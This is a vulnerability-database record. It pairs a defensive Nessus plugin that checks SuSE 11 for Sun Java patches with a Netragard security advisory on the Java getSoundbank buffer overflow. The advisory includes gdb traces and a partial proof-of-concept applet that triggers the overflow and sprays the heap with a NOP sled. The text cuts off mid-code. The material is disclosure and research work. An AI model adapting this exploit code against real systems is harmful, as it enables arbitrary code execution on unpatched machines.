crafted DER\n encoded data, which is not properly decoded by the ASN.1\n DER input stream parser, aka Bug Id 6864911.\n (CVE-2009-3876)\n\n - Unspecified vulnerability in Sun Java SE in JDK and JRE\n 5.0 before Update 22, JDK and JRE 6 before Update 17,\n SDK and JRE 1.3.x before 1.3.1_27, and SDK and JRE\n 1.4.x before 1.4.2_24 allows remote attackers to cause a\n denial of service (memory consumption) via crafted HTTP\n headers, which are not properly parsed by the ASN.1 DER\n input stream parser, aka Bug Id 6864911. 
(CVE-2009-3877)\n\n - The Java Update functionality in Java Runtime\n Environment (JRE) in Sun Java SE in JDK and JRE 5.0\n before Update 22 and JDK and JRE 6 before Update 17,\n when a non-English version of Windows is used, does not\n retrieve available new JRE versions, which allows remote\n attackers to leverage vulnerabilities in older releases\n of this software, aka Bug Id 6869694. (CVE-2009-3864)\n\n - The launch method in the Deployment Toolkit plugin in\n Java Runtime Environment (JRE) in Sun Java SE in JDK and\n JRE 6 before Update 17 allows remote attackers to\n execute arbitrary commands via a crafted web page, aka\n Bug Id 6869752. (CVE-2009-3865)\n\n - Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and\n JRE 6 before Update 17, SDK and JRE 1.3.x before\n 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 does\n not properly parse color profiles, which allows remote\n attackers to gain privileges via a crafted image file,\n aka Bug Id 6862970. (CVE-2009-3868)\n\n - Unspecified vulnerability in the JPEG JFIF Decoder in\n Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and\n JRE 6 before Update 17, SDK and JRE 1.3.x before\n 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows\n remote attackers to gain privileges via a crafted image\n file, aka Bug Id 6862969. 
(CVE-2009-3872)\n\n - The JPEG Image Writer in Sun Java SE in JDK and JRE 5.0\n before Update 22, JDK and JRE 6 before Update 17, and\n SDK and JRE 1.4.x before 1.4.2 _24 allows remote\n attackers to gain privileges via a crafted image file,\n related to a 'quanization problem,' aka Bug Id 6862968.\n (CVE-2009-3873)", "edition": 25, "published": "2009-11-19T00:00:00", "title": "SuSE 11 Security Update : Sun Java 1.6.0 (SAT Patch Number 1542)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-3876", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3866", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3865", "CVE-2009-3877", "CVE-2009-3864", "CVE-2009-3868"], "modified": "2009-11-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:java-1_6_0-sun", "p-cpe:/a:novell:suse_linux:11:java-1_6_0-sun-src", "p-cpe:/a:novell:suse_linux:11:java-1_6_0-sun-jdbc", "cpe:/o:novell:suse_linux:11", "p-cpe:/a:novell:suse_linux:11:java-1_6_0-sun-alsa", "p-cpe:/a:novell:suse_linux:11:java-1_6_0-sun-plugin", "p-cpe:/a:novell:suse_linux:11:java-1_6_0-sun-demo"], "id": "SUSE_11_JAVA-1_6_0-SUN-091113.NASL", "href": "https://www.tenable.com/plugins/nessus/42857", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. 
The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(42857);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-3864\", \"CVE-2009-3865\", \"CVE-2009-3866\", \"CVE-2009-3867\", \"CVE-2009-3868\", \"CVE-2009-3869\", \"CVE-2009-3871\", \"CVE-2009-3872\", \"CVE-2009-3873\", \"CVE-2009-3874\", \"CVE-2009-3875\", \"CVE-2009-3876\", \"CVE-2009-3877\");\n\n script_name(english:\"SuSE 11 Security Update : Sun Java 1.6.0 (SAT Patch Number 1542)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Sun Java 6 SDK/JRE was updated to u17 update fixing bugs and\nvarious security issues :\n\n - The Java Web Start Installer in Sun Java SE in JDK and\n JRE 6 before Update 17 does not properly use security\n model permissions when removing installer extensions,\n which allows remote attackers to execute arbitrary code\n by modifying a certain JNLP file to have a URL field\n that poi nts to an unintended trusted application, aka\n Bug Id 6872824. (CVE-2009-3866)\n\n - Stack-based buffer overflow in the\n HsbParser.getSoundBank function in Sun Java SE in JDK\n and JRE 5.0 before Update 22, JDK and JRE 6 before\n Update 17, SDK and JRE 1.3.x before 1.3.1_27, and SDK\n and JRE 1.4.x before 1.4.2_24 allows remote attackers to\n execute arbitrary code via a long file: URL in an\n argument, aka Bug Id 6854303. 
(CVE-2009-3867)\n\n - Stack-based buffer overflow in the setDiffICM function\n in the Abstract Window Toolkit (AWT) in Java Runtime\n Environment (JRE) in Sun Java SE in JDK and JRE 5.0\n before Update 22, JDK and JRE 6 before Update 17, SDK\n and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x\n before 1.4.2_ 24 allows remote attackers to execute\n arbitrary code via a crafted argument, aka Bug Id\n 6872357. (CVE-2009-3869)\n\n - Heap-based buffer overflow in the setBytePixels function\n in the Abstract Window Toolkit (AWT) in Java Runtime\n Environment (JRE) in Sun Java SE in JDK and JRE 5.0\n before Update 22, JDK and JRE 6 before Update 17, SDK\n and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x\n before 1.4. 2_24 allows remote attackers to execute\n arbitrary code via crafted arguments, aka Bug Id\n 6872358. (CVE-2009-3871)\n\n - Integer overflow in the JPEGImageReader implementation\n in the ImageI/O component in Sun Java SE in JDK and JRE\n 5.0 before Update 22, JDK and JRE 6 before Update 17,\n and SDK and JRE 1.4.x before 1.4.2_24 allows remote\n attackers to execute arbitrary code via large subsample\n dimensi ons in a JPEG file that triggers a heap-based\n buffer overflow, aka Bug Id 6874643. 
(CVE-2009-3874)\n\n - The MessageDigest.isEqual function in Java Runtime\n Environment (JRE) in Sun Java SE in JDK and JRE 5.0\n before Update 22, JDK and JRE 6 befor e Update 17, SDK\n and JRE 1.3.x before 1.3.1_27, and SDK and JRE 1.4.x\n before 1.4.2_24 allows remote attackers to spoof\n HMAC-based digital si gnatures, and possibly bypass\n authentication, via unspecified vectors related to\n 'timing attack vulnerabilities,' aka Bug Id 6863503.\n (CVE-2009-3875)\n\n - Unspecified vulnerability in Sun Java SE in JDK and JRE\n 5.0 before Update 22, JDK and JRE 6 before Update 17,\n SDK and JRE 1.3.x before 1.3.1 _27, and SDK and JRE\n 1.4.x before 1.4.2_24 allows remote attackers to cause a\n denial of service (memory consumption) via crafted DER\n encoded data, which is not properly decoded by the ASN.1\n DER input stream parser, aka Bug Id 6864911.\n (CVE-2009-3876)\n\n - Unspecified vulnerability in Sun Java SE in JDK and JRE\n 5.0 before Update 22, JDK and JRE 6 before Update 17,\n SDK and JRE 1.3.x before 1.3.1 _27, and SDK and JRE\n 1.4.x before 1.4.2_24 allows remote attackers to cause a\n denial of service (memory consumption) via crafted HTTP\n header s, which are not properly parsed by the ASN.1 DER\n input stream parser, aka Bug Id 6864911. (CVE-2009-3877)\n\n - The Java Update functionality in Java Runtime\n Environment (JRE) in Sun Java SE in JDK and JRE 5.0\n before Update 22 and JDK and JRE 6 before Update 17,\n when a non-English version of Windows is used, does not\n retrieve available new JRE versions, which allows remote\n attackers to lev erage vulnerabilities in older releases\n of this software, aka Bug Id 6869694. (CVE-2009-3864)\n\n - The launch method in the Deployment Toolkit plugin in\n Java Runtime Environment (JRE) in Sun Java SE in JDK and\n JRE 6 before Update 17 allows remote attackers to\n execute arbitrary commands via a crafted web page, aka\n Bug Id 6869752. 
(CVE-2009-3865)\n\n - Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and\n JRE 6 before Update 17, SDK and JRE 1.3.x before\n 1.3.1_27, and SDK and JRE 1.4.x be fore 1.4.2_24 does\n not properly parse color profiles, which allows remote\n attackers to gain privileges via a crafted image file,\n aka Bug Id 6862970. (CVE-2009-3868)\n\n - Unspecified vulnerability in the JPEG JFIF Decoder in\n Sun Java SE in JDK and JRE 5.0 before Update 22, JDK and\n JRE 6 before Update 17, SDK a nd JRE 1.3.x before\n 1.3.1_27, and SDK and JRE 1.4.x before 1.4.2_24 allows\n remote attackers to gain privileges via a crafted image\n file, aka Bug Id 6862969. (CVE-2009-3872)\n\n - The JPEG Image Writer in Sun Java SE in JDK and JRE 5.0\n before Update 22, JDK and JRE 6 before Update 17, and\n SDK and JRE 1.4.x before 1.4.2 _24 allows remote\n attackers to gain privileges via a crafted image file,\n related to a 'quanization problem,' aka Bug Id 6862968.\n (CVE-2009-3873)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=552586\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3864.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3865.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3866.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3867.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3868.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3869.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3871.html\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3872.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3873.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3874.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3875.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3876.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3877.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 1542.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java JRE AWT setDiffICM Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 264, 310, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_6_0-sun\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_6_0-sun-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_6_0-sun-demo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_6_0-sun-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_6_0-sun-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:java-1_6_0-sun-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/11/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"java-1_6_0-sun-1.6.0.u17-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"java-1_6_0-sun-alsa-1.6.0.u17-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", 
reference:\"java-1_6_0-sun-demo-1.6.0.u17-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"java-1_6_0-sun-jdbc-1.6.0.u17-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"java-1_6_0-sun-plugin-1.6.0.u17-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"java-1_6_0-sun-src-1.6.0.u17-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"java-1_6_0-sun-1.6.0.u17-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"java-1_6_0-sun-alsa-1.6.0.u17-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"java-1_6_0-sun-demo-1.6.0.u17-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"java-1_6_0-sun-jdbc-1.6.0.u17-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"java-1_6_0-sun-plugin-1.6.0.u17-1.1.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"java-1_6_0-sun-src-1.6.0.u17-1.1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:43", "description": "", "published": "2009-12-30T00:00:00", "type": "packetstorm", "title": "Netragard Security Advisory 2009-12-19", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3728", "CVE-2009-3873", "CVE-2009-3872", "CVE-2009-3867", "CVE-2009-3866", "CVE-2009-3875", "CVE-2009-3869", "CVE-2009-3874", "CVE-2009-3871", "CVE-2009-3865", "CVE-2009-3877", "CVE-2009-3884", "CVE-2009-3868"], "modified": "2009-12-30T00:00:00", "id": "PACKETSTORM:84499", "href": "https://packetstormsecurity.com/files/84499/Netragard-Security-Advisory-2009-12-19.html", "sourceData": "`[Advisory Summary] 
\n----------------------------------------------------------------------- \nAdvisory Author : Adriel T. Desautels \nResearcher : Kevin Finisterre \nAdvisory ID : NETRAGARD-20091219 \nProduct Name : Mac OS X Java Runtime \nProduct Version : < Java for Mac OS X 10.6 Update 1 \nVendor Name : http://www.apple.com, http://www.sun.com \nType of Vulnerability : Buffer Overflow \nImpact : Arbitrary Code Execution \nVendor Notified : Yes \nPatch Released : http://support.apple.com/kb/HT3969 \nDiscovery Date : 11/13/2009 \n \n[POSTING NOTICE] \n----------------------------------------------------------------------- \nIf you intend to post this advisory on your web-site you must provide \na clickable link back to http://www.netragard.com. The contents of \nthis advisory may be updated without notice. \n \n[Product Description] \n----------------------------------------------------------------------- \nMac OS X is the only major consumer operating system that comes complete \nwith a fully configured and ready-to-use Java runtime and development \nenvironment. Professional Java developers are increasingly turning to \nthe feature-rich Mac OS X as the operating system of choice for both \nMac-based and cross-platform Java development projects. Mac OS X \nincludes \nthe full version of J2SE 1.5, pre-installed with the Java Development \nKit (JDK) and the HotSpot virtual machine (VM), so you don't have to \ndownload, install, or configure anything. \n \nDeploying Java applications on Mac OS X takes advantage of many built-in \nfeatures, including 64-bit support, resolution independence, automatic \nsupport of multiprocessor hardware, native support for the Java \nAccessibility API, and the native Aqua look and feel. As a result, \nJava applications on Mac OS X look and perform like native applications \non Mac OS X. 
\n \n \n[Technical Summary] \n----------------------------------------------------------------------- \nOn November 4th, 2009 ZDI-09-076 was released and subsequently credited \nto 'Anonymous'. Given the historic track record with regards to lagging \nbehind 3rd party \"coordinated\" disclosures we decided to validate \nwhether or not OSX was vulnerable in its current state. More importantly \nwe wanted to validate that the vulnerable classes were reachable via \nstandard web browser. \n \nThe ZDI release contained limited information but that didn't prevent \nus from creating a working Proof of Concept (\"PoC\") for this issue. \n \nAs previously mentioned, the prime reason that we decided to look into \nthis \nvulnerability was because we suspected that it was possible to remotely \ntrigger and exploit the risk via the Safari Web Browser. We were right. \n \nThe easiest way to validate this was to find an example applet that used \nthe getSoundbank() function and then to modify \nit. \n \nA quick glance at the Sun manual page gave us a hint as to how to \nuse the function. \n \nhttp://java.sun.com/j2se/1.3/docs/api/javax/sound/midi/MidiSystem.html#getSoundbank(java.net.URL) \n \npublic static Soundbank getSoundbank(URL url) \nthrows InvalidMidiDataException, IOException \nConstructs a Soundbank by reading it from the specified URL. \nThe URL must point to a valid MIDI soundbank file. \n \nParameters: \nurl - the source of the sound bank data \n \nReturns: \nthe sound bank \n \nThrows: \nInvalidMidiDataException - if the URL does not point to valid MIDI \nsoundbank data recognized by the system \nIOException - if an I/O error occurred when loading the soundbank \n \nWe used a google query to find an example: \nhttp://www.google.com/search?hl=en&source=hp&q=javax.sound.midi+getSoundbank+applet&aq=f&oq=&aqi= \n \nLuckily the example was an applet which eliminates the question of \naccessibility to the vulnerability via applet tag. 
\n \nhttp://music.columbia.edu/pipermail/jmsl/2004-November/000555.html \n \nIf you modify the above code example we can trigger the bug and get \nand some additional information about it. \n \nAll of the testing below was done with appletviewer and the following \nhtml page, coupled with our compiled proof of concept class. \n \n$ cat index.html \n<title> getSoundBank pwn </title> \n</head><body> \n \n<applet code=\"test.class\" width=\"150\" height=\"25\"> \n</applet> \n \n \n[Technical Details] \n----------------------------------------------------------------------- \nhttp://www.zerodayinitiative.com/advisories/ZDI-09-076/ tells us there \nis a 'vulnerability [that] allows remote attackers to execute arbitrary \ncode on vulnerable installations of Sun Microsystems Java.' \n \nZDI also states that 'The specific flaw exists in the parsing of \nlong file:// URL arguments to the getSoundbank() function.' and that \n'Exploitation of this vulnerability can lead to system compromise under \nthe credentials of the currently logged in user.' \n \nThe code shown below in the Proof of Concept section allows us to \nvalidate \nthe statements made by ZDI by triggering the bug and subsequently \ncrashing \nthe JVM. \n \nWhen the JVM crashes it leaves a log behind in the /Library/Logs/Java \nfolder that provides useful information. \n \n$ ls /Library/Logs/Java/ \nJavaNativeCrash_pid1815.crash.log \n \nOne of the important things recorded to the log is the address of \nthe JVM's heap. Since a heap spray is used to place shellcode at \na usable address this is quite useful. \n \n$ cat /Library/Logs/Java/JavaNativeCrash_pid1815.crash.log \n \nJava information: \nVersion: Java HotSpot(TM) Client VM (1.5.0_13-119 mixed mode, sharing) \nVirtual Machine version: Java HotSpot(TM) Client VM (1.5.0_13-119) for \\ \nmacosx-x86, built on Sep 28 2007 23:59:21 by root with gcc 4.0.1 \n(Apple \\ \nInc. 
build 5465) \n \nException type: Bus Error (0xa) at pc=0x1755c81b \n \nCurrent thread (0x0100e010): JavaThread \"thread applet-test.class\"\\ \n[_thread_in_native, id=9097216] \n \nStack: [0xb0d97000,0xb0e17000) \nJava frames: (J=compiled Java code, j=interpreted, Vv=VM code) \nj com.sun.media.sound.HeadspaceSoundbank.nOpenResource(Ljava/lang/ \nString;)J+0 \nj com.sun.media.sound.HeadspaceSoundbank.initialize(Ljava/lang/ \nString;)V+7 \nj com.sun.media.sound.HeadspaceSoundbank.<init>(Ljava/net/URL;)V+89 \nj com.sun.media.sound.HsbParser.getSoundbank(Ljava/net/URL;)Ljavax/ \nsound/midi/Soundbank;+5 \nj javax.sound.midi.MidiSystem.getSoundbank(Ljava/net/URL;)Ljavax/ \nsound/midi/Soundbank;+36 \nj test.init()V+339 \nj sun.applet.AppletPanel.run()V+197 \nj java.lang.Thread.run()V+11 \nv ~StubRoutines::call_stub \nJava Threads: ( => current thread ) \n0x01011980 JavaThread \"Java Sound Event Dispatcher\" daemon \n[_thread_blocked, id=9269760] \n0x01011790 JavaThread \"Java Sound Event Dispatcher\" daemon \n[_thread_blocked, id=9266176] \n0x01011310 JavaThread \"AWT-EventQueue-1\" [_thread_blocked, \nid=9249792] \n0x01001440 JavaThread \"DestroyJavaVM\" [_thread_blocked, \nid=-1333784576] \n0x0100e210 JavaThread \"AWT-EventQueue-0\" [_thread_blocked, \nid=9107968] \n=>0x0100e010 JavaThread \"thread applet-test.class\" [_thread_in_native, \nid=9097216] \n0x0100cb90 JavaThread \"Java2D Disposer\" daemon [_thread_blocked, \nid=9035264] \n0x0100bda0 JavaThread \"AWT-Shutdown\" [_thread_blocked, id=8834048] \n0x0100b900 JavaThread \"AWT-AppKit\" daemon [_thread_in_native, \nid=-1607766176] \n0x01009050 JavaThread \"Low Memory Detector\" daemon \n[_thread_blocked, id=8411136] \n0x01008580 JavaThread \"CompilerThread0\" daemon [_thread_blocked, \nid=8506880] \n0x01008120 JavaThread \"Signal Dispatcher\" daemon [_thread_blocked, \nid=8503296] \n0x01007810 JavaThread \"Finalizer\" daemon [_thread_blocked, \nid=8483840] \n0x01007570 JavaThread \"Reference Handler\" daemon 
[_thread_blocked, \nid=8480256] \nOther Threads: \n0x01006cc0 VMThread [id=8476672] \n0x01009c50 WatcherThread [id=8414720] \n \nVM state:not at safepoint (normal execution) \nVM Mutex/Monitor currently owned by a thread: None \n \nHeap \ndef new generation total 4544K, used 3238K [0x25580000, \n0x25a60000, 0x25a60000) \neden space 4096K, 79% used [0x25580000, 0x258a9b30, 0x25980000) \nfrom space 448K, 0% used [0x259f0000, 0x259f0000, 0x25a60000) \nto space 448K, 0% used [0x25980000, 0x25980000, 0x259f0000) \ntenured generation total 60544K, used 60028K [0x25a60000, \n0x29580000, 0x29580000) \nthe space 60544K, 99% used [0x25a60000, 0x294ff048, 0x294ff200, \n0x29580000) \ncompacting perm gen total 8192K, used 1093K [0x29580000, \n0x29d80000, 0x2d580000) \nthe space 8192K, 13% used [0x29580000, 0x29691698, 0x29691800, \n0x29d80000) \nro space 8192K, 63% used [0x2d580000, 0x2da96c48, 0x2da96e00, \n0x2dd80000) \nrw space 12288K, 43% used [0x2dd80000, 0x2e2af088, 0x2e2af200, \n0x2e980000) \n \nVirtual Machine arguments: \nJVM args: -Dapplication.home=/System/Library/Frameworks/ \nJavaVM.framework/Versions/1.5.0/Home \nJava command: sun.applet.Main /Users/hostile/Desktop/index.html \nlauncher type: SUN_STANDARD \n \nNote: The heap within appletviewer is located at '0x25580000' \n \nWhen triggered with Safari the Heap location is slightly different \n \n$ cat /Library/Logs/Java/JavaNativeCrash_pid1815.crash.log \n... \nHeap \ndef new generation total 6848K, used 5542K [0x1a270000, \n0x1a9d0000, 0x1a9d0000) \n... \n \nIn that particular trace the Safari Java heap was located at 0x1a270000. \n \nThe PoC provided below instructs appletviewer to land in a nopsled. \nFuther \nresearch will yield a functional exploit. In essence this code sprays \nthe \nheap in order to place attacker controlled code at the proper address \nrange \nwithin the heap. With several stack frames under control it is \npossible to \ncontrol the flow of execution. 
Control of an eax address is what leads \nto \nfinal code execution. \n \n0x1891a81b <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+108>:\\ \ncall *0x2a8(%eax) \n \n \n[Proof Of Concept] \n----------------------------------------------------------------------- \n \n/* \n \nWe should only need safe shellcode at this point. \n \nInvalid memory access of location 00000000 eip=256823b6 \n \nProgram received signal EXC_BAD_ACCESS, Could not access memory. \nReason: KERN_PROTECTION_FAILURE at address: 0x00000000 \n[Switching to process 561 thread 0x15107] \n0x256823b6 in ?? () \n(gdb) bt \n#0 0x256823b6 in ?? () \n#1 0x188fd821 in \nJava_com_sun_media_sound_HeadspaceSoundbank_nOpenResource () \n#2 0x25582126 in ?? () \nPrevious frame inner to this frame (gdb could not unwind past this \nframe) \n \n(gdb) x/6x 0x256823b6-12 \n0x256823aa: 0x90909090 0x90909090 0x90909090 0x00333031 \n0x256823ba: 0x00330032 0x00010033 \n \nWe only crash because we ran out of code to execute... \n(gdb) x/i $eip \n0x256823b6: xor %esi,(%eax) \n(gdb) i r $esi $eax \nesi 0x0 0 \neax 0x0 0 \n \nnotice that frame 1's eip of 0x188fd821 is AFTER the call to eax at \n0x1891a81b \n \n(gdb) x/10i$eip \n0x1891a803 <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+84>: mov (%edx),%eax \n0x1891a805 <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+86>: mov 0x10(%ebp),%edx \n0x1891a808 <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+89>: mov %edi,0x8(%esp) \n0x1891a80c <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+93>: mov %esi,%edi \n0x1891a80e <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+95>: sar $0x1f,%edi \n0x1891a811 <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+98>: mov %edx,0x4(%esp) \n0x1891a815 <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+102>: mov 0x8(%ebp),%edx \n0x1891a818 <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+105>: mov %edx,(%esp) \n0x1891a81b 
<Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+108>: call *0x2a8(%eax) \n0x1891a821 <Java_com_sun_media_sound_HeadspaceSoundbank_nOpenResource \n+114>: add $0x450,%esp \n \n*/ \nimport javax.sound.midi.*; \nimport java.io.*; \nimport java.net.*; \n \nimport java.awt.Graphics; \npublic class test extends java.applet.Applet \n{ \npublic static Synthesizer synth; \nSoundbank soundbank; \n \npublic void init() \n{ \nString fName = repeat('/',1080); // OSX Leopard - 10.5 Build 9A581 \nJava(TM) 2 Runtime Environment, Standard Edition (build 1.5.0_13- \nb05-237) \n \n// heap sprayed info starts at 0x25580000+12 but keep in mind we \nneed to be fairly ascii safe. \n// 0x20 is not usable \nbyte[] frame = { \n(byte)0x22, (byte)0x21, (byte)0x58, (byte)0x25, // frame 1 - ebp \n(byte)0x26, (byte)0x21, (byte)0x58, (byte)0x25, // frame 1 - eip \n(byte)0x22, (byte)0x21, (byte)0x58, (byte)0x25 // frame 0 - edx \n}; \n \nString mal = new String(frame); \n \n//System.out.println(mal); \n \nfName = \"file://\" + fName + mal; \ntry \n{ \nsynth = MidiSystem.getSynthesizer(); \nsynth.open(); \nSystem.out.println(\"Spray heap\\n\"); \n \nString shellcode = \"\\u41424344\" + repeat('\\u9090',1000) + \n\"\\u30313233\"; // This is just a nop sled with some heading and \ntrailing markers. \nint mb = 1024; \n \n// Sotirov / Dowd foo follows. 
\n// http://taossa.com/archive/bh08sotirovdowd.pdf \n \n// Limit the shellcode length to 100KB \nif (shellcode.length() > 100*1024) \n{ \nthrow new RuntimeException(); \n} \n// Limit the heap spray size to 1GB, even though in practice the \nJava \n// heap for an applet is limited to 100MB \nif (mb > 1024) \n{ \nthrow new RuntimeException(); \n} \n// Array of strings containing shellcode \nString[] mem = new String[1024]; \n \n// A buffer for the nop slide and shellcode \nStringBuffer buffer = new StringBuffer(1024*1024/2); \n \n// Each string takes up exactly 1MB of space \n// \n// header nop slide shellcode NULL \n// 12 bytes 1MB-12-2-x x bytes 2 bytes \n \n// Build padding up to the first exception. We will need to set \nthe eax address after this padding \n// First usable addresses begin at 0x25580000+0x2121. Unfortunately \n0x20 in our addresses caused issues. \n// 0x2121 is 8481 in decimal, we subtract a few bytes for munging. \n \nfor (int i = 1; i < (8481/2)-4; i++) \n{ \nbuffer.append('\\u4848'); \n} \n \n// (gdb) x/10a 0x25582122-4 \n// 0x2558211e: 